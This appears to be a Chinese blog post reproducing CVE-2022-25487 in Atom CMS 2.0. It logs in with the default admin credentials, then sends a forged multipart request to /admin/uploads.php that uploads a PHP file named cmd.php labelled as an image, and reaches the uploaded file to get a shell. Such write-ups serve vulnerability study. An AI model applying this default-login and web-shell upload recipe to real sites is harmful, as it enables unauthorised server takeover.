CVE-2022-25487 漏洞复现

漏洞描述:Atom CMS 2.0版本存在远程代码执行漏洞,该漏洞源于/admin/uploads.php 未能正确过滤构造代码段的特殊元素。攻击者可利用该漏洞导致任意代码执行。

其实这就是一个文件上传漏洞罢了。。。。

打开之后,/home路由是个空白

CVE-2022-25487 漏洞复现_第1张图片

信息搜集:该cms有默认邮箱/密码 [email protected]/password,到/admin路由下尝试登录。

CVE-2022-25487 漏洞复现_第2张图片

Users下有个上传文件功能,可能是上传头像用的。

CVE-2022-25487 漏洞复现_第3张图片

CVE-2022-25487 漏洞复现_第4张图片

抓包中无文件上传的内容????(奇奇怪怪)

看了一下,漏洞路由在/admin/uploads.php,直接在界面中点击到不了这个路由。。。。

直接修改刚刚的包吧

CVE-2022-25487 漏洞复现_第5张图片

直接传php文件,这cms写的真shit

Content-Type: multipart/form-data; boundary=---------------------------30623082103363803402542706041





-----------------------------30623082103363803402542706041
Content-Disposition: form-data; name="file"


-----------------------------30623082103363803402542706041
Content-Disposition: form-data; name="file"; filename="cmd.php"
Content-Type: image/jpeg



-----------------------------30623082103363803402542706041--

CVE-2022-25487 漏洞复现_第6张图片

访问木马存储路由/uploads/1707520195231.phpgetshell

CVE-2022-25487 漏洞复现_第7张图片

你可能感兴趣的:(CVE复现,漏洞复现,CVE,Web安全,网络安全,PHP,CVE-2022-25487)